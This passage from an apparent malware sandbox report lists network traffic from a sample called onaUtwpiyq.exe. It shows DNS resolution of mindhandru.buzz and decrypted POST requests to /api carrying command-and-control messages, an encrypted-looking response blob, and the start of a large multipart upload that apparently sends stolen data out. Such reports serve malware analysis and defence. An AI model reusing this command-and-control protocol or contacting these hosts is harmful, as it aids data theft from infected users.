                                                                                                              Dec 27, 2024 09:02:04.784243107 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:04.784446001 CET49736443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:04.784462929 CET44349736104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:05.383850098 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.383907080 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:05.383976936 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.384370089 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:05.384387970 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.687932968 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.688004971 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.689275980 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.689290047 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.689533949 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:06.690680981 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.690774918 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:06.690781116 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587187052 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587284088 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:07.587356091 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:07.587652922 CET49742443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:07.587668896 CET44349742104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:08.171426058 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.171472073 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:08.171538115 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.172004938 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:08.172019005 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.428596020 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.428663015 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.429961920 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.429972887 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.430212975 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.431435108 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432209015 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432255030 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.432389975 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432419062 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.432543993 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.432574034 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433487892 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433527946 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433657885 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433692932 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433851004 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433886051 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.433898926 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.433906078 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.434041023 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434067965 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.434092999 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434254885 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.434283972 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479329109 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479558945 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479598999 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479625940 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479640961 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479660034 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479669094 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:09.479722977 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:09.479738951 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119383097 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119489908 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.119566917 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.119826078 CET49749443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.119874001 CET44349749104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.155530930 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.155575991 CET44349760104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.155636072 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.156181097 CET49760443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 09:02:12.156193972 CET44349760104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 09:02:12.999874115 CET49760443192.168.2.9104.21.11.101

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 09:01:53.064291954 CET6322553192.168.2.91.1.1.1
                                                                                                              Dec 27, 2024 09:01:53.203809977 CET53632251.1.1.1192.168.2.9

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 09:01:53.064291954 CET192.168.2.91.1.1.10xd109Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 09:01:49.723926067 CET1.1.1.1192.168.2.90x757aNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 27, 2024 09:01:49.723926067 CET1.1.1.1192.168.2.90x757aNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                              Dec 27, 2024 09:01:53.203809977 CET1.1.1.1192.168.2.90xd109No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                              Dec 27, 2024 09:01:53.203809977 CET1.1.1.1192.168.2.90xd109No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • mindhandru.buzz

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.949712104.21.11.1014433784C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:01:54 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:01:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-27 08:01:55 UTC1119INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:01:55 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=a1q63skk8iui8n1q6ctspd1523; expires=Tue, 22 Apr 2025 01:48:34 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAPvDES51DP3YdkCrQYo4zVqTglfo7e%2FCiDUDIY9KWKJmUVzkX%2ByuQ4OmUdKhdwYmemJleiPW33BBso5B8rBh1VdocdrZg0lZn2lPTqHRVNJxNbUXmBu1aZvcckxsLaLnIw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c90d9cb07ca6-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4214&recv_bytes=906&delivery_rate=45155&cwnd=236&unsent_bytes=0&cid=7e50b77aec6ab1a5&ts=804&x=0"
                                                                                                              2024-12-27 08:01:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-27 08:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.949718104.21.11.1014433784C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:01:56 UTC263OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 47
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:01:56 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                              2024-12-27 08:01:57 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:01:57 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=rhn18o91dg3acjtqn28p7f4kb4; expires=Tue, 22 Apr 2025 01:48:36 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvK7TCjY2df7l97yv9ZJ9wPm%2BYA47V9j97jxK%2BLT8qZH3b%2Bv%2Bj1smcvQGG7jj3Zi0Flz4YgU8KvhSNOwNn0QCbXNdcQFCiWubeORg7J%2FYH6%2FYNQhe1p%2B4%2B3rC%2BWPKenzHvI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c91b5e3342b7-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1707&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1710603&cwnd=212&unsent_bytes=0&cid=a0373df714f3f0eb&ts=872&x=0"
                                                                                                              2024-12-27 08:01:57 UTC234INData Raw: 63 34 65 0d 0a 43 77 4e 37 64 61 73 2b 34 56 4b 74 6e 2b 39 79 6d 42 75 69 4f 6d 56 47 41 67 4f 70 7a 59 66 2b 4e 70 36 2f 68 66 7a 35 76 53 78 77 49 51 31 58 6b 51 72 4e 63 4e 37 36 7a 55 6a 73 61 64 64 66 53 57 52 6a 5a 34 76 33 34 5a 39 61 37 64 71 70 33 6f 2f 51 44 6a 46 6c 47 68 6e 59 57 38 31 77 79 4f 66 4e 53 4d 4e 67 67 46 38 4c 5a 44 67 68 7a 4b 66 6c 6e 31 72 38 33 75 36 54 69 64 46 50 59 32 38 63 48 63 35 64 68 54 50 42 38 6f 6f 58 2f 58 72 49 56 41 77 72 61 6d 36 4c 34 61 57 62 54 4c 79 46 70 37 47 63 79 55 31 47 59 67 67 65 69 55 50 4e 4b 59 2f 36 67 56 43 69 4f 63 4e 66 42 79 70 6b 5a 38 4b 6c 37 35 5a 53 2f 64 76 76 6a 4a 44 62 52 47 4e 68 48 78 7a 45 56 4a 45 2b 79 2f 57 42 45
                                                                                                              Data Ascii: c4eCwN7das+4VKtn+9ymBuiOmVGAgOpzYf+Np6/hfz5vSxwIQ1XkQrNcN76zUjsaddfSWRjZ4v34Z9a7dqp3o/QDjFlGhnYW81wyOfNSMNggF8LZDghzKfln1r83u6TidFPY28cHc5dhTPB8ooX/XrIVAwram6L4aWbTLyFp7GcyU1GYggeiUPNKY/6gVCiOcNfBypkZ8Kl75ZS/dvvjJDbRGNhHxzEVJE+y/WBE
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 66 64 36 67 42 5a 48 49 33 67 68 6b 2b 2b 32 72 6c 66 74 7a 50 4b 54 69 39 6b 4f 64 69 38 41 56 38 35 51 77 32 69 50 39 59 45 65 2f 33 72 50 58 77 59 6b 63 6d 37 4c 72 4f 32 55 55 50 62 53 36 4a 47 56 31 55 6c 68 61 42 34 59 7a 6c 53 46 50 38 79 39 77 31 44 39 59 59 41 41 52 77 52 77 59 73 69 37 36 49 30 55 34 35 50 2b 33 70 7a 54 44 6a 45 68 48 78 6e 49 55 59 4d 69 78 2f 61 47 46 65 68 79 79 56 55 4b 4a 47 31 72 78 4b 7a 6c 6d 31 37 32 30 75 32 61 6c 74 4a 49 61 57 46 5a 57 59 6c 62 6d 33 43 58 76 61 34 56 36 6e 37 4d 54 6b 55 65 49 48 36 46 74 71 57 62 57 4c 79 46 70 35 61 65 33 45 31 69 62 68 6f 66 77 6b 36 44 49 73 6e 77 69 41 4c 38 66 4d 35 53 42 44 5a 71 62 38 32 73 37 4a 64 64 2b 64 72 6a 33 74 57 66 53 58 45 68 51 56 66 6f 55 59 67 38 78 65 71 4e
                                                                                                              Data Ascii: fd6gBZHI3ghk++2rlftzPKTi9kOdi8AV85Qw2iP9YEe/3rPXwYkcm7LrO2UUPbS6JGV1UlhaB4YzlSFP8y9w1D9YYAARwRwYsi76I0U45P+3pzTDjEhHxnIUYMix/aGFehyyVUKJG1rxKzlm1720u2altJIaWFZWYlbm3CXva4V6n7MTkUeIH6FtqWbWLyFp5ae3E1ibhofwk6DIsnwiAL8fM5SBDZqb82s7Jdd+drj3tWfSXEhQVfoUYg8xeqN
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 4a 59 43 7a 5a 73 61 38 32 67 36 4a 41 55 73 70 33 67 68 74 75 48 44 6b 4e 69 44 52 54 44 48 72 59 7a 77 66 4f 4b 42 72 70 6d 6a 6b 46 48 49 32 77 68 6b 2b 2f 6f 6e 56 7a 36 7a 2b 69 54 6d 4e 46 41 5a 6d 51 57 48 38 6c 63 6a 6a 58 4c 39 6f 59 54 39 33 33 53 55 67 63 73 5a 57 44 42 70 61 58 53 46 50 76 46 70 38 62 62 37 6c 6c 69 49 79 77 55 78 31 4b 45 4a 6f 2f 69 77 77 6d 36 66 73 77 59 58 32 52 74 61 63 36 71 36 70 31 65 38 74 6a 74 6b 70 50 52 54 58 74 75 48 52 66 46 56 49 6b 39 77 66 6d 46 47 66 46 79 78 6c 67 47 4c 69 41 76 69 36 6a 39 33 41 79 38 36 65 43 53 6c 74 41 4d 58 47 49 58 47 63 35 4b 77 79 2b 42 35 4d 30 58 39 6a 6d 59 47 41 73 74 59 47 72 42 71 2b 57 62 57 66 6e 65 34 4a 32 57 32 45 52 6e 5a 68 30 62 77 46 47 46 4d 4d 6a 35 69 41 4c 2f 63
                                                                                                              Data Ascii: JYCzZsa82g6JAUsp3ghtuHDkNiDRTDHrYzwfOKBrpmjkFHI2whk+/onVz6z+iTmNFAZmQWH8lcjjXL9oYT933SUgcsZWDBpaXSFPvFp8bb7lliIywUx1KEJo/iwwm6fswYX2Rtac6q6p1e8tjtkpPRTXtuHRfFVIk9wfmFGfFyxlgGLiAvi6j93Ay86eCSltAMXGIXGc5Kwy+B5M0X9jmYGAstYGrBq+WbWfne4J2W2ERnZh0bwFGFMMj5iAL/c
                                                                                                              2024-12-27 08:01:57 UTC185INData Raw: 52 62 6e 65 4c 73 4b 75 46 46 50 76 52 70 38 62 62 31 6b 64 37 62 78 63 65 78 46 71 4c 4e 38 48 77 68 68 62 78 66 73 64 65 43 69 78 74 5a 4d 69 75 34 5a 5a 47 2f 39 62 74 6b 35 47 66 41 43 6c 6d 41 56 65 52 48 4b 51 38 35 75 32 57 41 75 77 35 33 78 59 65 5a 47 64 74 69 2f 65 6c 6e 31 76 31 30 75 2b 57 6c 4e 42 4b 5a 32 63 66 47 73 78 54 69 53 4c 48 38 34 41 62 39 58 4c 53 57 41 6f 67 62 47 58 44 70 4f 2f 63 47 72 7a 61 2f 39 37 44 6e 33 74 6b 62 68 6b 55 33 78 79 63 66 74 61 39 69 68 79 36 49 59 42 55 43 53 52 76 62 63 65 6b 37 5a 31 59 38 74 0d 0a
                                                                                                              Data Ascii: RbneLsKuFFPvRp8bb1kd7bxcexFqLN8HwhhbxfsdeCixtZMiu4ZZG/9btk5GfAClmAVeRHKQ85u2WAuw53xYeZGdti/eln1v10u+WlNBKZ2cfGsxTiSLH84Ab9XLSWAogbGXDpO/cGrza/97Dn3tkbhkU3xycfta9ihy6IYBUCSRvbcek7Z1Y8t
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 33 63 63 65 0d 0a 72 69 6c 35 50 58 58 47 68 6c 45 52 62 48 55 34 49 30 79 76 69 4a 46 2f 35 2f 7a 78 68 4a 5a 47 64 35 69 2f 65 6c 73 33 50 4a 6e 38 61 6b 32 38 41 41 63 43 45 65 47 34 6b 45 77 7a 7a 4d 38 59 55 66 2f 48 44 4d 55 67 34 76 62 47 72 50 6f 2b 79 5a 55 76 33 59 34 70 2b 66 30 30 52 76 59 68 6f 59 78 6c 4f 4c 63 49 47 39 69 67 69 36 49 59 42 39 45 43 39 75 5a 34 75 77 71 34 55 55 2b 39 47 6e 78 74 76 54 52 32 39 6e 48 42 76 49 57 6f 73 31 78 2f 6d 4d 46 76 78 36 7a 31 77 43 4a 57 39 6c 78 36 48 76 6e 56 58 77 31 75 69 56 6e 70 38 41 4b 57 59 42 56 35 45 63 73 6a 50 5a 36 70 30 63 75 6d 61 4f 51 55 63 6a 62 43 47 54 37 2b 53 4f 58 76 62 54 34 70 47 65 33 45 46 75 62 42 38 62 77 31 57 4c 4e 73 44 30 6e 78 50 32 64 38 64 57 43 79 70 74 61 38 69
                                                                                                              Data Ascii: 3cceril5PXXGhlERbHU4I0yviJF/5/zxhJZGd5i/els3PJn8ak28AAcCEeG4kEwzzM8YUf/HDMUg4vbGrPo+yZUv3Y4p+f00RvYhoYxlOLcIG9igi6IYB9EC9uZ4uwq4UU+9GnxtvTR29nHBvIWos1x/mMFvx6z1wCJW9lx6HvnVXw1uiVnp8AKWYBV5EcsjPZ6p0cumaOQUcjbCGT7+SOXvbT4pGe3EFubB8bw1WLNsD0nxP2d8dWCypta8i
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 2b 37 58 34 4a 6d 51 31 30 56 6d 5a 77 73 62 78 30 36 47 49 74 32 39 77 31 44 39 59 59 41 41 52 78 4a 6e 63 64 75 73 70 36 31 43 2f 38 76 73 6b 35 65 66 55 53 64 34 57 52 44 46 48 4e 74 77 79 66 4b 45 45 2f 56 34 79 56 51 4b 49 57 6c 6b 79 71 6e 68 6c 6c 37 38 32 2b 47 66 6e 74 56 4e 61 47 73 51 45 4d 46 62 67 43 4b 50 73 38 30 58 34 6a 6d 59 47 43 34 6a 63 6d 2f 62 37 2f 72 53 54 62 7a 61 36 39 37 44 6e 30 70 6a 62 68 30 51 78 56 71 47 4e 73 4c 38 67 68 48 36 64 73 52 54 44 69 4a 68 62 4d 36 69 34 59 35 65 39 39 4c 72 6c 35 66 53 44 69 63 68 48 67 2b 4a 42 4d 4d 42 77 76 4f 44 46 2b 77 35 33 78 59 65 5a 47 64 74 69 2f 65 6c 6e 56 6a 7a 33 75 69 64 6d 4e 35 45 65 33 4d 56 48 73 46 5a 6a 7a 76 42 2b 35 38 57 39 58 44 44 57 77 34 6a 61 47 33 42 72 4f 4c 63
                                                                                                              Data Ascii: +7X4JmQ10VmZwsbx06GIt29w1D9YYAARxJncdusp61C/8vsk5efUSd4WRDFHNtwyfKEE/V4yVQKIWlkyqnhll782+GfntVNaGsQEMFbgCKPs80X4jmYGC4jcm/b7/rSTbza697Dn0pjbh0QxVqGNsL8ghH6dsRTDiJhbM6i4Y5e99Lrl5fSDichHg+JBMMBwvODF+w53xYeZGdti/elnVjz3uidmN5Ee3MVHsFZjzvB+58W9XDDWw4jaG3BrOLc
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 47 4f 6a 4e 68 52 4a 33 68 5a 45 4d 55 63 32 33 44 4a 39 49 73 58 2f 48 66 53 58 51 45 72 62 32 6a 43 71 2b 32 66 56 50 6a 5a 34 4a 75 59 30 30 56 75 59 68 59 54 77 46 4b 4b 50 34 2b 7a 7a 52 66 69 4f 5a 67 59 4a 6a 39 6a 62 63 62 76 2b 74 4a 4e 76 4e 72 72 33 73 4f 66 51 6d 64 6b 47 52 33 50 57 49 59 32 78 66 69 4e 47 2f 6c 32 78 46 34 44 4b 32 42 71 77 71 37 6a 6d 56 37 33 32 2b 71 64 6e 64 6b 4f 4a 79 45 65 44 34 6b 45 77 78 44 55 38 49 45 58 75 6d 61 4f 51 55 63 6a 62 43 47 54 37 2b 36 51 55 50 76 64 36 70 32 54 32 6b 70 6a 5a 42 6b 66 32 31 53 44 4e 39 33 76 6a 52 6e 2f 64 63 4e 59 41 79 4a 70 5a 38 69 72 70 64 49 55 2b 38 57 6e 78 74 76 79 51 6d 35 49 48 67 79 4a 51 38 30 70 6a 2f 71 42 55 4b 49 35 77 56 4d 4e 4b 32 31 69 7a 61 7a 75 6d 56 37 39 32
                                                                                                              Data Ascii: GOjNhRJ3hZEMUc23DJ9IsX/HfSXQErb2jCq+2fVPjZ4JuY00VuYhYTwFKKP4+zzRfiOZgYJj9jbcbv+tJNvNrr3sOfQmdkGR3PWIY2xfiNG/l2xF4DK2Bqwq7jmV732+qdndkOJyEeD4kEwxDU8IEXumaOQUcjbCGT7+6QUPvd6p2T2kpjZBkf21SDN93vjRn/dcNYAyJpZ8irpdIU+8WnxtvyQm5IHgyJQ80pj/qBUKI5wVMNK21izazumV792
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 66 46 6a 73 76 57 51 57 4a 42 4d 4e 33 7a 4f 2b 66 46 76 6c 76 77 78 38 35 47 6b 64 33 77 61 6a 31 6d 30 50 7a 6e 61 6e 65 6c 4a 38 57 55 43 45 51 45 4e 4a 4e 6c 54 33 66 2b 73 30 76 74 44 6e 59 47 46 39 6b 56 57 4c 46 6f 65 4b 4b 52 62 48 36 38 5a 53 63 7a 30 6c 2b 62 6c 6c 5a 69 56 72 44 61 4a 79 7a 7a 52 54 72 4f 5a 67 49 56 58 38 31 4d 70 7a 2f 74 34 4d 61 35 5a 33 78 33 73 4f 4e 41 43 6c 7a 57 55 2b 4a 47 34 41 69 33 66 75 4f 42 76 6b 2b 2f 6d 59 67 50 6d 31 6e 33 4c 37 62 6f 6c 50 6d 30 4f 47 4a 69 70 4e 62 61 6d 38 58 45 4e 38 63 7a 58 44 41 76 64 55 70 75 6a 47 41 5a 30 6c 6b 65 43 47 54 37 39 43 66 57 76 4c 61 38 59 2f 57 2b 46 52 6b 5a 77 34 47 69 52 4c 44 4e 6f 2b 6c 33 56 36 36 66 64 45 59 58 33 51 79 4f 70 37 38 73 73 77 47 34 35 50 2b 33 6f
                                                                                                              Data Ascii: fFjsvWQWJBMN3zO+fFvlvwx85Gkd3waj1m0PznanelJ8WUCEQENJNlT3f+s0vtDnYGF9kVWLFoeKKRbH68ZScz0l+bllZiVrDaJyzzRTrOZgIVX81Mpz/t4Ma5Z3x3sONAClzWU+JG4Ai3fuOBvk+/mYgPm1n3L7bolPm0OGJipNbam8XEN8czXDAvdUpujGAZ0lkeCGT79CfWvLa8Y/W+FRkZw4GiRLDNo+l3V66fdEYX3QyOp78sswG45P+3o
                                                                                                              2024-12-27 08:01:57 UTC1369INData Raw: 5a 67 38 47 69 52 4c 44 50 34 2b 6c 74 46 43 79 4f 66 38 57 52 7a 77 67 4f 59 75 61 35 70 4a 61 2b 38 76 32 30 37 7a 52 53 57 68 33 43 51 44 47 48 4d 31 77 79 62 33 56 51 72 51 35 78 45 6c 48 66 44 41 7a 6b 50 71 32 79 77 53 75 77 71 6d 48 32 38 6b 4f 4d 54 4e 58 56 39 73 63 32 33 43 49 2f 70 38 43 2f 48 72 57 57 30 41 61 58 6b 62 46 71 4f 53 4b 52 4f 76 53 71 4c 43 74 2f 6e 42 58 64 42 6f 5a 78 31 75 56 49 59 2b 7a 7a 52 2b 36 49 66 6b 59 54 32 52 66 4c 34 75 33 70 63 51 55 79 64 37 70 6b 4a 7a 4a 58 79 52 47 46 78 44 49 53 70 4d 6e 77 4c 4b 6a 4a 74 73 35 6a 68 67 42 5a 44 67 7a 68 65 2f 68 6a 52 53 6b 6a 62 58 46 7a 6f 77 5a 4f 54 4d 47 57 64 41 63 6c 58 43 58 72 38 4e 51 36 44 6d 59 47 45 41 6e 63 6e 50 4e 72 50 4f 66 45 38 4c 6a 77 4a 43 63 33 6c 68
                                                                                                              Data Ascii: Zg8GiRLDP4+ltFCyOf8WRzwgOYua5pJa+8v207zRSWh3CQDGHM1wyb3VQrQ5xElHfDAzkPq2ywSuwqmH28kOMTNXV9sc23CI/p8C/HrWW0AaXkbFqOSKROvSqLCt/nBXdBoZx1uVIY+zzR+6IfkYT2RfL4u3pcQUyd7pkJzJXyRGFxDISpMnwLKjJts5jhgBZDgzhe/hjRSkjbXFzowZOTMGWdAclXCXr8NQ6DmYGEAncnPNrPOfE8LjwJCc3lh


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.949724104.21.11.1014433784C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:01:59 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=DYUBSUUYZEJ58FRNYT
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12845
                                                                                                              Host: mindhandru.buzz
